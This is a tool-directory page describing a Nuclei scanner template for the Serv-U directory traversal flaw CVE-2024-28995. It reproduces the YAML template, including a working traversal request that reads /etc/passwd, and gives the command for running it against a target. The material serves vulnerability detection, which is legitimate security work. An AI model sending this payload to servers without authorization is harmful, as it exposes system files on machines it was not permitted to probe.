Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-28995-Nuclei-Template — 用于检测 CVE-2024-28995 的 Nuclei 模板,该漏洞是 Serv-U FTP 服务器中的目录遍历漏洞,可通过精心构造的 HTTP 请求实现文件读取。 | Kitploit
工具/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
漏洞扫描器Web漏洞扫描器漏洞分析漏洞利用Web安全渗透测试
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

用于检测 CVE-2024-28995 的 Nuclei 模板,该漏洞是 Serv-U FTP 服务器中的目录遍历漏洞,可通过精心构造的 HTTP 请求实现文件读取。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1142年前尚未审核
分享

CVE-2024-28995 Nuclei 模板

检测 Serv-U 15.4.2 及更低版本中的目录遍历漏洞,允许读取敏感文件如 /etc/passwd。

模板详情

id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



使用方法

要使用此模板配合 Nuclei,请将模板内容保存为名为 CVE-2024-28995.yaml 的文件,然后运行以下命令:

nuclei -t CVE-2024-28995.yaml -u <target-url>

将 <target-url> 替换为您要扫描的目标 URL。

联系方式

如有任何疑问或需要更多信息,您可以通过以下方式联系我:

  • LinkedIn
  • Twitter
下载工具